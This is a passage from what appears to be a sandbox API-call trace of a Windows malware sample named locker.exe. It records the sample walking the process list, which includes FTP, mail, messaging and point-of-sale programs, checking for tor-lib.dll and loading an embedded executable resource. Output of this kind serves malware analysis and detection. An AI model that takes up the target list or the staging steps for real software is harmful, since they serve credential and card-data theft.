dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0078.633] GetCurrentProcessId () returned 0x1170 [0078.633] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0078.634] GetCurrentProcessId () returned 0x1170 [0078.634] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0078.635] GetCurrentProcessId () returned 0x1170 [0078.635] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0078.636] GetCurrentProcessId () returned 0x1170 [0078.637] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0078.638] GetCurrentProcessId () returned 0x1170 [0078.638] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0078.639] GetCurrentProcessId () returned 0x1170 [0078.639] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0078.640] GetCurrentProcessId () returned 0x1170 [0078.640] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0078.641] GetCurrentProcessId () returned 0x1170 [0078.641] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0078.642] GetCurrentProcessId () returned 0x1170 [0078.642] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0078.643] GetCurrentProcessId () returned 0x1170 [0078.643] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0078.645] GetCurrentProcessId () returned 0x1170 [0078.645] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0078.646] GetCurrentProcessId () returned 0x1170 [0078.646] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0078.656] GetCurrentProcessId () returned 0x1170 [0078.656] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0078.657] GetCurrentProcessId () returned 0x1170 [0078.657] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0078.658] GetCurrentProcessId () returned 0x1170 [0078.658] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0078.660] GetCurrentProcessId () returned 0x1170 [0078.660] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0078.661] GetCurrentProcessId () returned 0x1170 [0078.661] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0078.662] GetCurrentProcessId () returned 0x1170 [0078.662] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0078.663] GetCurrentProcessId () returned 0x1170 [0078.663] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0078.664] GetCurrentProcessId () returned 0x1170 [0078.664] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0078.665] GetCurrentProcessId () returned 0x1170 [0078.665] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0078.666] GetCurrentProcessId () returned 0x1170 [0078.666] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0078.667] GetCurrentProcessId () returned 0x1170 [0078.667] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0078.668] GetCurrentProcessId () returned 0x1170 [0078.668] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0078.669] GetCurrentProcessId () returned 0x1170 [0078.669] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0078.670] GetCurrentProcessId () returned 0x1170 [0078.670] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0078.671] GetCurrentProcessId () returned 0x1170 [0078.671] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0078.672] GetCurrentProcessId () returned 0x1170 [0078.672] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0078.673] GetCurrentProcessId () returned 0x1170 [0078.673] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0078.674] GetCurrentProcessId () returned 0x1170 [0078.674] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0078.675] GetCurrentProcessId () returned 0x1170 [0078.675] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0078.676] GetCurrentProcessId () returned 0x1170 [0078.676] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0078.677] GetCurrentProcessId () returned 0x1170 [0078.677] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0078.680] GetCurrentProcessId () returned 0x1170 [0078.680] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0078.681] GetCurrentProcessId () returned 0x1170 [0078.681] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0078.682] GetCurrentProcessId () returned 0x1170 [0078.682] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0078.683] GetCurrentProcessId () returned 0x1170 [0078.683] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0078.683] GetCurrentProcessId () returned 0x1170 [0078.683] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0078.684] GetCurrentProcessId () returned 0x1170 [0078.684] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0078.685] GetCurrentProcessId () returned 0x1170 [0078.685] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0078.686] GetCurrentProcessId () returned 0x1170 [0078.686] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0078.687] GetCurrentProcessId () returned 0x1170 [0078.687] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0078.688] GetCurrentProcessId () returned 0x1170 [0078.688] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="supervisor.exe")) returned 1 [0078.689] GetCurrentProcessId () returned 0x1170 [0078.689] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1044, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="delivered-memo.exe")) returned 1 [0078.690] GetCurrentProcessId () returned 0x1170 [0078.690] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="convicted.exe")) returned 1 [0078.691] GetCurrentProcessId () returned 0x1170 [0078.691] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.691] GetCurrentProcessId () returned 0x1170 [0078.691] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x107c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="held.exe")) returned 1 [0078.692] GetCurrentProcessId () returned 0x1170 [0078.692] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="diningcrmbases.exe")) returned 1 [0078.701] GetCurrentProcessId () returned 0x1170 [0078.701] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0078.701] GetCurrentProcessId () returned 0x1170 [0078.701] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0078.702] GetCurrentProcessId () returned 0x1170 [0078.702] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0078.703] GetCurrentProcessId () returned 0x1170 [0078.703] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0078.704] GetCurrentProcessId () returned 0x1170 [0078.704] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0078.705] GetCurrentProcessId () returned 0x1170 [0078.705] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0078.706] GetCurrentProcessId () returned 0x1170 [0078.706] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0078.706] GetCurrentProcessId () returned 0x1170 [0078.706] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x11f4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0078.707] GetCurrentProcessId () returned 0x1170 [0078.707] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x11e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0078.708] GetCurrentProcessId () returned 0x1170 [0078.708] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.709] GetCurrentProcessId () returned 0x1170 [0078.709] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0078.709] GetCurrentProcessId () returned 0x1170 [0078.709] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0078.710] GetCurrentProcessId () returned 0x1170 [0078.710] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="locker.exe")) returned 1 [0078.711] GetCurrentProcessId () returned 0x1170 [0078.711] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="locker.exe")) returned 0 [0078.712] CloseHandle (hObject=0x238) returned 1 [0078.712] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d2978 | out: hHeap=0x3c0000) returned 1 [0078.712] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfb24, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0078.712] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x3d2cc0 [0078.712] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x772d0000 [0078.712] GetProcAddress (hModule=0x772d0000, lpProcName="AreFileApisANSI") returned 0x772e4280 [0078.712] AreFileApisANSI () returned 1 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0078.713] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x3d7548 [0078.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x3d7548, cchWideChar=36 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll") returned 36 [0078.713] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\tor-lib.dll"), fInfoLevelId=0x0, lpFileInformation=0xdcfab4 | out: lpFileInformation=0xdcfab4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x3d2cc0, ftLastAccessTime.dwLowDateTime=0xdcfadc, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xdcfd04, nFileSizeHigh=0x104, nFileSizeLow=0xdcfcfc)) returned 0 [0078.713] GetLastError () returned 0x2 [0078.713] GetLastError () returned 0x2 [0078.713] SetLastError (dwErrCode=0x2) [0078.713] GetLastError () returned 0x2 [0078.713] SetLastError (dwErrCode=0x2) [0078.713] GetLastError () returned 0x2 [0078.713] SetLastError (dwErrCode=0x2) [0078.713] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d7548 | out: hHeap=0x3c0000) returned 1 [0078.713] GetModuleHandleA (lpModuleName=0x0) returned 0x320000 [0078.713] FindResourceA (hModule=0x320000, lpName=0x67, lpType="Executable") returned 0x38e048 [0078.714] LoadResource (hModule=0x320000, hResInfo=0x38e048) returned 0x38e070 [0078.714] LockResource (hResData=0x38e070) returned 0x38e070 [0078.714] SizeofResource (hModule=0x320000, hResInfo=0x38e048) returned 0x9800 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x3da920 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0370 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3da980 [0078.714] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da980 | out: hHeap=0x3c0000) returned 1 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3da930 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x3daf28 [0078.714] GetLastError () returned 0x2 [0078.714] SetLastError (dwErrCode=0x2) [0078.714] GetLastError () returned 0x2 [0078.714] SetLastError (dwErrCode=0x2) [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3e4ac0 [0078.714] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.714] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.715] GetLastError () returned 0x2 [0078.715] SetLastError (dwErrCode=0x2) [0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3daa50 [0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3daa60 [0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x3da980 [0078.715] GetLastError () returned 0x2 [0078.715] SetLastError (dwErrCode=0x2) [0078.715] GetLastError () returned 0x2 [0078.715] SetLastError (dwErrCode=0x2) 